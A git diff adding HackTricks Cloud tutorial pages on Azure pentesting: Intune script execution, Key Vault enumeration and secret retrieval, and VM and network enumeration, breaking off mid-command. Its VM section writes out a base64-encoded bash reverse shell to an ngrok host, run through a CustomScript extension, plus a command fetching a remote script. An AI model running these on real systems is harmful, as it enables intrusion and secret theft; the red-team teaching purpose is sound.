+{% content-ref url="../az-persistence/az-storage-persistence.md" %}
+[az-storage-persistence.md](../az-persistence/az-storage-persistence.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-services/intune.md b/pentesting-cloud/azure-security/az-services/intune.md
new file mode 100644
index 0000000000..1c5274e152
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-services/intune.md
@@ -0,0 +1,57 @@
+# Az - Intune
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+Microsoft Intune is designed to streamline the process of **app and device management**. Its capabilities extend across a diverse range of devices, encompassing mobile devices, desktop computers, and virtual endpoints. The core functionality of Intune revolves around **managing user access and simplifying the administration of applications** and devices within an organization's network.
+
+## Cloud -> On-Prem
+
+A user with **Global Administrator** or **Intune Administrator** role can execute **PowerShell** scripts on any **enrolled Windows** device.\
+The **script** runs with **privileges** of **SYSTEM** on the device only once if it doesn't change, and from Intune it's **not possible to see the output** of the script.
+
+```powershell
+Get-AzureADGroup -Filter "DisplayName eq 'Intune Administrators'"
+```
+
+1. Login into [https://endpoint.microsoft.com/#home](https://endpoint.microsoft.com/#home) or use Pass-The-PRT
+2. Go to **Devices** -> **All Devices** to check devices enrolled to Intune
+3. Go to **Scripts** and click on **Add** for Windows 10.
+4. Add a **Powershell script**
+   * ![](<../../../.gitbook/assets/image (264).png>)
+5. Specify **Add all users** and **Add all devices** in the **Assignments** page.
+
+The execution of the script can take up to **one hour**.
+
+## References
+
+* [https://learn.microsoft.com/en-us/mem/intune/fundamentals/what-is-intune](https://learn.microsoft.com/en-us/mem/intune/fundamentals/what-is-intune)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-services/keyvault.md b/pentesting-cloud/azure-security/az-services/keyvault.md
new file mode 100644
index 0000000000..f49f1fb4f1
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-services/keyvault.md
@@ -0,0 +1,208 @@
+# Az - Key Vault
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+**Azure Key Vault** is a cloud service provided by Microsoft Azure for securely storing and managing sensitive information such as **secrets, keys, certificates, and passwords**. It acts as a centralized repository, offering secure access and fine-grained control using Azure Active Directory (Azure AD). From a security perspective, Key Vault provides **hardware security module (HSM) protection** for cryptographic keys, ensures secrets are encrypted both at rest and in transit, and offers robust access management through **role-based access control (RBAC)** and policies. It also features **audit logging**, integration with Azure Monitor for tracking access, and automated key rotation to reduce risk from prolonged key exposure.
+
+See [Azure Key Vault REST API overview](https://learn.microsoft.com/en-us/azure/key-vault/general/about-keys-secrets-certificates) for complete details.
+
+According to the [**docs**](https://learn.microsoft.com/en-us/azure/key-vault/general/basic-concepts), Vaults support storing software and HSM-backed keys, secrets, and certificates. Managed HSM pools only support HSM-backed keys.
+
+The **URL format** for **vaults** is `https://{vault-name}.vault.azure.net/{object-type}/{object-name}/{object-version}` and for managed HSM pools it's: `https://{hsm-name}.managedhsm.azure.net/{object-type}/{object-name}/{object-version}`
+
+Where:
+
+* `vault-name` is the globally **unique** name of the key vault
+* `object-type` can be "keys", "secrets" or "certificates"
+* `object-name` is **unique** name of the object within the key vault
+* `object-version` is system generated and optionally used to address a **unique version of an object**.
+
+In order to access to the secrets stored in the vault it's possible to select between 2 permissions models when creating the vault:
+
+* **Vault access policy**
+* **Azure RBAC** (most common and recommended)
+  * You can find all the granular permissions supported in [https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/security#microsoftkeyvault](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/security#microsoftkeyvault)
+
+### Access Control <a href="#access-control" id="access-control"></a>
+
+Access to a Key Vault resource is controlled by two planes:
+
+* The **management plane**, whose target is [management.azure.com](http://management.azure.com/).
+  * It's used to manage the key vault and **access policies**. Only Azure role based access control (**RBAC**) is supported.
+* The **data plane**, whose target is **`<vault-name>.vault.azure.com`**.
+  * It's used to manage and access the **data** (keys, secrets and certificates) **in the key vault**. This supports **key vault access policies** or Azure **RBAC**.
+
+A role like **Contributor** that has permissions in the management place to manage access policies can get access to the secrets by modifying the access policies.
+
+### Key Vault RBAC Built-In Roles <a href="#rbac-built-in-roles" id="rbac-built-in-roles"></a>
+
+<figure><img src="../../../.gitbook/assets/image (27).png" alt=""><figcaption></figcaption></figure>
+
+### Network Access
+
+In Azure Key Vault, **firewall** rules can be set up to **allow data plane operations only from specified virtual networks or IPv4 address ranges**. This restriction also affects access through the Azure administration portal; users will not be able to list keys, secrets, or certificates in a key vault if their login IP address is not within the authorized range.
+
+For analyzing and managing these settings, you can use the **Azure CLI**:
+
+```bash
+az keyvault show --name name-vault --query networkAcls
+```
+
+The previous command will display the f**irewall settings of `name-vault`**, including enabled IP ranges and policies for denied traffic.
+
+Moreover, it's possible to create a **private endpoint** to allow a private connection to a vault.
+
+### Deletion Protection
+
+When a key vault is created the minimum number of days to allow for deletion is 7. Which means that whenever you try to delete that key vault it'll need **at least 7 days to be deleted**.
+
+However, it's possible to create a vault with **purge protection disabled** which allow key vault and objects to be purged during retention period. Although, once this protection is enabled for a vault it cannot be disabled.
+
+## Enumeration
+
+{% tabs %}
+{% tab title="az" %}
+{% code overflow="wrap" %}
+```bash
+# List all Key Vaults in the subscription
+az keyvault list
+# List Key Vaults in a specific Resource Group
+az keyvault list --resource-group <ResourceGroupName>
+# Show details of a specific Key Vault
+az keyvault show --name <KeyVaultName> # If accessPolicies, you can see them here
+# List all keys in a Key Vault
+az keyvault key list --vault-name <KeyVaultName>
+# List all secrets in a Key Vault
+az keyvault secret list --vault-name <KeyVaultName>
+# Get versions of a secret
+az keyvault secret list-versions --vault-name <KeyVaultName> --name <SecretName>
+# List all certificates in a Key Vault
+az keyvault certificate list --vault-name <KeyVaultName>
+# List all deleted Key Vaults in the subscription
+az keyvault list-deleted
+# Get properties of a deleted Key Vault
+az keyvault show-deleted --name <KeyVaultName>
+# Get assigned roles
+az role assignment list --include-inherited --scope "/subscriptions/<subscription-uuid>/resourceGroups/<resource-group>/providers/Microsoft.KeyVault/vaults/<vault-name>"
+
+# Get secret value
+az keyvault secret show --vault-name <KeyVaultName> --name <SecretName>
+# Get old versions secret value
+az keyvault secret show --id https://<KeyVaultName>.vault.azure.net/secrets/<KeyVaultName>/<idOldVersion>
+```
+{% endcode %}
+{% endtab %}
+
+{% tab title="Az Powershell" %}
+{% code overflow="wrap" %}
+```powershell
+# Get keyvault token
+curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
+
+# Connect with PS AzureAD
+## $token from management API
+Connect-AzAccount -AccessToken $token -AccountId 1937ea5938eb-10eb-a365-10abede52387 -KeyVaultAccessToken $keyvaulttoken
+
+# Get details of a specific Key Vault
+Get-AzKeyVault -VaultName <KeyVaultName>
+# List all keys in a Key Vault
+Get-AzKeyVaultKey -VaultName <KeyVaultName>
+# List all secrets in a Key Vault
+Get-AzKeyVaultSecret -VaultName <KeyVaultName>
+# List all certificates in a Key Vault
+Get-AzKeyVaultCertificate -VaultName <KeyVaultName>
+# List all deleted Key Vaults in the subscription
+Get-AzKeyVault -InRemovedState
+# Get properties of a deleted Key Vault
+Get-AzKeyVault -VaultName <KeyVaultName> -InRemovedState
+# Get secret values
+Get-AzKeyVaultSecret -VaultName <vault_name> -Name <secret_name> -AsPlainText
+```
+{% endcode %}
+{% endtab %}
+
+{% tab title="az script" %}
+```bash
+#!/bin/bash
+
+# Dump all keyvaults from the subscription
+
+# Define Azure subscription ID
+AZ_SUBSCRIPTION_ID="your-subscription-id"
+
+# Specify the filename for output
+CSV_OUTPUT="vault-names-list.csv"
+
+# Login to Azure account
+az login
+
+# Select the desired subscription
+az account set --subscription $AZ_SUBSCRIPTION_ID
+
+# Retrieve all resource groups within the subscription
+AZ_RESOURCE_GROUPS=$(az group list --query "[].name" -o tsv)
+
+# Initialize the CSV file with headers
+echo "Vault Name,Associated Resource Group" > $CSV_OUTPUT
+
+# Iterate over each resource group
+for GROUP in $AZ_RESOURCE_GROUPS
+do
+  # Fetch key vaults within the current resource group
+  VAULT_LIST=$(az keyvault list --resource-group $GROUP --query "[].name" -o tsv)
+
+  # Process each key vault
+  for VAULT in $VAULT_LIST
+  do
+    # Extract the key vault's name
+    VAULT_NAME=$(az keyvault show --name $VAULT --resource-group $GROUP --query "name" -o tsv)
+
+    # Append the key vault name and its resource group to the file
+    echo "$VAULT_NAME,$GROUP" >> $CSV_OUTPUT
+  done
+done
+```
+{% endtab %}
+{% endtabs %}
+
+## Privilege Escalation
+
+{% content-ref url="../az-privilege-escalation/az-key-vault-privesc.md" %}
+[az-key-vault-privesc.md](../az-privilege-escalation/az-key-vault-privesc.md)
+{% endcontent-ref %}
+
+## Post Exploitation
+
+{% content-ref url="../az-post-exploitation/az-key-vault-post-exploitation.md" %}
+[az-key-vault-post-exploitation.md](../az-post-exploitation/az-key-vault-post-exploitation.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-services/vms/README.md b/pentesting-cloud/azure-security/az-services/vms/README.md
new file mode 100644
index 0000000000..9ff2e58ba2
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-services/vms/README.md
@@ -0,0 +1,751 @@
+# Az - Virtual Machines & Network
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Azure Networking Basic Info
+
+Azure networks contains **different entities and ways to configure it.** You can find a brief **descriptions,** **examples** and **enumeration** commands of the different Azure network entities in:
+
+{% content-ref url="az-azure-network.md" %}
+[az-azure-network.md](az-azure-network.md)
+{% endcontent-ref %}
+
+## VMs Basic information
+
+Azure Virtual Machines (VMs) are flexible, on-demand **cloud-based servers that let you run Windows or Linux operating systems**. They allow you to deploy applications and workloads without managing physical hardware. Azure VMs can be configured with various CPU, memory, and storage options to meet specific needs and integrate with Azure services like virtual networks, storage, and security tools.
+
+### Security Configurations
+
+* **Availability Zones**: Availability zones are distinct groups of datacenters within a specific Azure region which are physically separated to minimize the risk of multiple zones being affected by local outages or disasters.
+* **Security Type**:
+  * **Standard Security**: This is the default security type that does not require any specific configuration.
+  * **Trusted Launch**: This security type enhances protection against boot kits and kernel-level malware by using Secure Boot and Virtual Trusted Platform Module (vTPM).
+  * **Confidential VMs**: On top of a trusted launch, it offers hardware-based isolation between the VM, hypervisor and host management, improves the disk encryption and [**more**](https://learn.microsoft.com/en-us/azure/confidential-computing/confidential-vm-overview)**.**
+* **Authentication**: By default a new **SSH key is generated**, although it's possible to use a public key or use a previous key and the username by default is **azureuser**. It's also possible to configure to use a **password.**
+* **VM disk encryption:** The disk is encrypted at rest by default using a platform managed key.
+  * It's also possible to enable **Encryption at host**, where the data will be encrypted in the host before sending it to the storage service, ensuring an end-to-end encryption between the host and the storage service ([**docs**](https://learn.microsoft.com/en-gb/azure/virtual-machines/disk-encryption#encryption-at-host---end-to-end-encryption-for-your-vm-data)).
+* **NIC network security group**:
+  * **None**: Basically opens every port
+  * **Basic**: Allows to easily open the inbound ports HTTP (80), HTTPS (443), SSH (22), RDP (3389)
+  * **Advanced**: Select a security group
+* **Backup**: It's possible to enable **Standard** backup (one a day) and **Enhanced** (multiple per day)
+* **Patch orchestration options**: This enable to automatically apply patches in the VMs according to the selected policy as described in the [**docs**](https://learn.microsoft.com/en-us/azure/virtual-machines/automatic-vm-guest-patching).
+* **Alerts**: It's possible to automatically get alerts by email or mobile app when something happen in the VM. Default rules:
+  * Percentage CPU is greater than 80%
+  * Available Memory Bytes is less than 1GB
+  * Data Disks IOPS Consumed Percentage is greater than 95%
+  * OS IOPS Consumed Percentage is greater than 95%
+  * Network in Total is greater than 500GB
+  * Network Out Total is greater than 200GB
+  * VmAvailabilityMetric is less than 1
+* **Heath monitor**: By default check protocol HTTP in port 80
+* **Locks**: It allows to lock a VM so it can only be read (**ReadOnly** lock) or it can be read and updated but not deleted (**CanNotDelete** lock).
+  * Most VM related resources **also support locks** like disks, snapshots...
+  * Locks can also be applied at **resource group and subscription levels**
+
+## Disks & snapshots
+
+* It's possible to **enable to attach a disk to 2 or more VMs**
+* By default every disk is **encrypted** with a platform key.
+  * Same in snapshots
+* By default it's possible to **share the disk from all networks**, but it can also be **restricted** to only certain **private acces**s or to **completely disable** public and private access.
+  * Same in snapshots
+* It's possible to **generate a SAS URI** (of max 60days) to **export the disk**, which can be configured to require authentication or not
+  * Same in snapshots
+
+```bash
+# List all disks
+az disk list --output table
+
+# Get info about a disk
+az disk show --name <disk-name> --resource-group <rsc-group>
+```
+
+## Images, Gallery Images & Restore points
+
+A **VM image** is a template that contains the operating system, application settings and filesystem needed to **create a new virtual machine (VM)**. The difference between an image and a disk snapshot is that a disk snapshot is a read-only, point-in-time copy of a single managed disk, used primarily for backup or troubleshooting, while an image can contain **multiple disks and is designed to serve as a template for creating new VMs**.\
+Images can be managed in the **Images section** of Azure or inside **Azure compute galleries** which allows to generate **versions** and **share** the image cross-tenant of even make it public.
+
+A **restore point** stores the VM configuration and **point-in-time** application-consistent **snapshots of all the managed disks** attached to the VM. It's related to the VM and its purpose is to be able to restore that VM to how it was in that specific point in it.
+
+```bash
+# Shared Image Galleries | Compute Galleries
+## List all galleries and get info about one
+az sig list --output table
+az sig show --gallery-name <name> --resource-group <rsc-group>
+
+## List all community galleries
+az sig list-community --output table
+
+## List galleries shaerd with me
+az sig list-shared --location <location> --output table 
+
+## List all image definitions in a gallery and get info about one
+az sig image-definition list --gallery-name <name> --resource-group <rsc-group> --output table
+az sig image-definition show --gallery-image-definition <name> --gallery-name <gallery-name> --resource-group <rsc-group>
+
+## List all the versions of an image definition in a gallery 
+az sig image-version list --gallery-image-name <image-name> --gallery-name <gallery-name> --resource-group <rsc-group --output table
+
+## List all VM applications inside a gallery
+az sig gallery-application list --gallery-name <gallery-name> --resource-group <res-group> --output table
+
+# Images 
+# List all managed images in your subscription
+az image list --output table
+
+# Restore points
+## List all restore points and get info about 1
+az restore-point collection list-all --output table
+az restore-point collection show --collection-name <collection-name> --resource-group <rsc-group>
+```
+
+## Azure Site Recovery
+
+From the [**docs**](https://learn.microsoft.com/en-us/azure/site-recovery/site-recovery-overview): Site Recovery helps ensure business continuity by keeping business apps and workloads running during outages. Site Recovery **replicates workloads** running on physical and virtual machines (VMs) from a primary site to a secondary location. When an outage occurs at your primary site, you fail over to a secondary location, and access apps from there. After the primary location is running again, you can fail back to it.
+
+## Azure Bastion
+
+Azure Bastion enables secure and seamless **Remote Desktop Protocol (RDP)** and **Secure Shell (SSH)** access to your virtual machines (VMs) directly through the Azure Portal or via a jump box. By **eliminating the need for public IP addresses** on your VMs.&#x20;
+
+The Bastion deploys a subnet called **`AzureBastionSubnet`** with a `/26` netmask in the VNet it needs to work on. Then, it allows to **connect to internal VMs through the browser** using `RDP` and `SSH` avoiding exposing ports of the VMs to the Internet. It can also work as a **jump host**.
+
+To list all Azure Bastion Hosts in your subscription and connect to VMs through them, you can use the following commands:
+
+{% code overflow="wrap" %}
+```bash
+# List bastions
+az network bastion list -o table
+
+# Connect via SSH through bastion
+az network bastion ssh \
+  --name MyBastion \
+  --resource-group MyResourceGroup \
+  --target-resource-id /subscriptions/12345678-1234-1234-1234-123456789abc/resourceGroups/MyResourceGroup/providers/Microsoft.Compute/virtualMachines/MyVM \
+  --auth-type ssh-key \
+  --username azureuser \
+  --ssh-key ~/.ssh/id_rsa
+
+# Connect via RDP through bastion
+az network bastion rdp \
+  --name <BASTION_NAME> \
+  --resource-group <RESOURCE_GROUP> \
+  --target-resource-id /subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP>/providers/Microsoft.Compute/virtualMachines/<VM_NAME> \
+  --auth-type password \
+  --username <VM_USERNAME> \
+  --password <VM_PASSWORD>
+```
+{% endcode %}
+
+## Metadata
+
+The Azure Instance Metadata Service (IMDS) **provides information about running virtual machine instances** to assist with their management and configuration. It offers details such as the SKU, storage, network configurations, and information about upcoming maintenance events via **REST API available at the non-routable IP address 169.254.169.254**, which is accessible only from within the VM. Communication between the VM and IMDS stays within the host, ensuring secure access. When querying IMDS, HTTP clients inside the VM should bypass web proxies to ensure proper communication.
+
+Moreover, to contact the metadata endpoint, the HTTP request must have the header **`Metadata: true`** and must not have the header **`X-Forwarded-For`**.
+
+Check how to enumerate it in:
+
+{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#azure-vm" %}
+
+## VM Enumeration
+
+{% tabs %}
+{% tab title="Az Cli" %}
+{% code overflow="wrap" %}
+```bash
+# VMs
+## List all VMs and get info about one
+az vm list --output table
+az vm show --name <came> --resource-group <rsc-group>
+
+## List all available VM images and get info about one
+az vm image list --all --output table
+
+# VM Extensions
+## List all VM extensions
+az vm extension image list --output table
+
+## Get extensions by publisher
+az vm extension image list --publisher "Site24x7" --output table
+
+## List extensions in a VM
+az vm extension list -g <rsc-group> --vm-name <vm-name>
+
+## List managed identities in a VM
+az vm identity show \
+  --resource-group <rsc-group> \
+  --name <vm-name>
+
+# Disks
+## List all disks and get info about one
+az disk list --output table
+az disk show --name <disk-name> --resource-group <rsc-group>
+
+# Snapshots
+## List all galleries abd get info about one
+az sig list --output table
+az sig show --gallery-name <name> --resource-group <rsc-group>
+
+## List all snapshots and get info about one
+az snapshot list --output table
+az snapshot show --name <name> --resource-group <rsc-group>
+
+# Shared Image Galleries | Compute Galleries
+## List all galleries and get info about one
+az sig list --output table
+az sig show --gallery-name <name> --resource-group <rsc-group>
+
+## List all community galleries
+az sig list-community --output table
+
+## List galleries shared with me
+az sig list-shared --location <location> --output table 
+
+## List all image definitions in a gallery and get info about one
+az sig image-definition list --gallery-name <name> --resource-group <rsc-group> --output table
+az sig image-definition show --gallery-image-definition <name> --gallery-name <gallery-name> --resource-group <rsc-group>
+
+## List all the versions of an image definition in a gallery 
+az sig image-version list --gallery-image-name <image-name> --gallery-name <gallery-name> --resource-group <rsc-group --output table
+
+## List all VM applications inside a gallery
+az sig gallery-application list --gallery-name <gallery-name> --resource-group <res-group> --output table
+
+# Images 
+# List all managed images in your subscription
+az image list --output table
+
+# Restore points
+## List all restore points and get info about 1
+az restore-point collection list-all --output table
+az restore-point collection show --collection-name <collection-name> --resource-group <rsc-group>
+
+# Bastion
+## list all bastions
+az network bastion list -o table
+
+# Network
+## List VNets
+az network vnet list --query "[].{name:name, location:location, addressSpace:addressSpace}"
+
+## List subnets of a VNet
+az network vnet subnet list --resource-group <ResourceGroupName> --vnet-name <VNetName> --query "[].{name:name, addressPrefix:addressPrefix}" -o table
+
+## List public IPs
+az network public-ip list --output table
+
+## Get NSG rules
+az network nsg rule list --nsg-name <NSGName> --resource-group <ResourceGroupName> --query "[].{name:name, priority:priority, direction:direction, access:access, protocol:protocol, sourceAddressPrefix:sourceAddressPrefix, destinationAddressPrefix:destinationAddressPrefix, sourcePortRange:sourcePortRange, destinationPortRange:destinationPortRange}" -o table
+
+## Get NICs and subnets using this NSG
+az network nsg show --name MyLowCostVM-nsg --resource-group Resource_Group_1 --query "{subnets: subnets, networkInterfaces: networkInterfaces}"
+
+## List all Nics & get info of a single one
+az network nic list --output table
+az network nic show --name <name> --resource-group <rsc-group>
+
+## List Azure Firewalls
+az network firewall list --query "[].{name:name, location:location, subnet:subnet, publicIp:publicIp}" -o table
+
+## Get network rules of a firewall
+az network firewall network-rule collection list --firewall-name <FirewallName> --resource-group <ResourceGroupName> --query "[].{name:name, rules:rules}" -o table
+
+## Get application rules of a firewall
+az network firewall application-rule collection list --firewall-name <FirewallName> --resource-group <ResourceGroupName> --query "[].{name:name, rules:rules}" -o table
+
+## Get nat rules of a firewall
+az network firewall nat-rule collection list --firewall-name <FirewallName> --resource-group <ResourceGroupName> --query "[].{name:name, rules:rules}" -o table
+
+## List Route Tables
+az network route-table list --query "[].{name:name, resourceGroup:resourceGroup, location:location}" -o table
+
+## List routes for a table
+az network route-table route list --route-table-name <RouteTableName> --resource-group <ResourceGroupName> --query "[].{name:name, addressPrefix:addressPrefix, nextHopType:nextHopType, nextHopIpAddress:nextHopIpAddress}" -o table
+
+# Misc
+## List all virtual machine scale sets
+az vmss list --output table
+
+## List all availability sets
+az vm availability-set list --output table
+
+## List all load balancers
+az network lb list --output table
+
+## List all storage accounts
+az storage account list --output table
+
+## List all custom script extensions on a specific VM
+az vm extension list --vm-name <vm-name> --resource-group <resource-group>
+
+# Show boot diagnostics settings for a specific VM
+az vm boot-diagnostics get-boot-log --name <vm-name> --resource-group <resource-group>
+
+## List all tags on virtual machines
+az resource list --resource-type "Microsoft.Compute/virtualMachines" --query "[].{Name:name, Tags:tags}" --output table
+
+# List all available run commands for virtual machines
+az vm run-command list --output table
+```
+{% endcode %}
+{% endtab %}
+
+{% tab title="Az PS" %}
+```powershell
+# Get readable VMs
+Get-AzVM | fl
+# Lis running VMs
+Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name
+Get-AzVM -Name <name> -ResourceGroupName <res_group_name> | fl *
+Get-AzVM -Name <name> -ResourceGroupName <res_group_name> | select -ExpandProperty NetworkProfile
+
+# Get iface and IP address
+Get-AzNetworkInterface -Name <interface_name>
+Get-AzPublicIpAddress -Name <iface_public_ip_id>
+
+#Get installed extensions
+Get-AzVMExtension -ResourceGroupName <res_group_name> -VMName <name>
+
+Get-AzVM | select -ExpandProperty NetworkProfile # Get name of network connector of VM
+Get-AzNetworkInterface -Name <name> # Get info of network connector (like IP)
+```
+{% endtab %}
+{% endtabs %}
+
+## Code Execution in VMs
+
+### VM Extensions
+
+Azure VM extensions are small applications that provide **post-deployment configuration** and automation tasks on Azure virtual machines (VMs).
+
+This would allow to **execute arbitrary code inside VMs**.
+
+The required permission is **`Microsoft.Compute/virtualMachines/extensions/write`**.
+
+It's possible to list all the available extensions with:
+
+```bash
+# It takes some mins to run
+az vm extension image list --output table
+
+# Get extensions by publisher
+az vm extension image list --publisher "Site24x7" --output table
+```
+
+It's possible to **run custom extensions that runs custom code**:
+
+{% tabs %}
+{% tab title="Linux" %}
+* Execute a revers shell
+
+{% code overflow="wrap" %}
+```bash
+# Prepare the rev shell
+echo -n 'bash -i  >& /dev/tcp/2.tcp.eu.ngrok.io/13215 0>&1' | base64
+YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ==
+
+# Execute rev shell
+az vm extension set \
+  --resource-group <rsc-group> \
+  --vm-name <vm-name> \
+  --name CustomScript \
+  --publisher Microsoft.Azure.Extensions \
+  --version 2.1 \
+  --settings '{}' \
+  --protected-settings '{"commandToExecute": "nohup echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ== | base64 -d | bash &"}'
+```
+{% endcode %}
+
+* Execute a script located on the internet
+
+{% code overflow="wrap" %}
+```bash
+az vm extension set \
+  --resource-group rsc-group> \
+  --vm-name <vm-name> \
+  --name CustomScript \
+  --publisher Microsoft.Azure.Extensions \
+  --version 2.1 \
+  --settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/8ce279967be0855cc13aa2601402fed3/raw/72816c3603243cf2839a7c4283e43ef4b6048263/hacktricks_touch.sh"]}' \
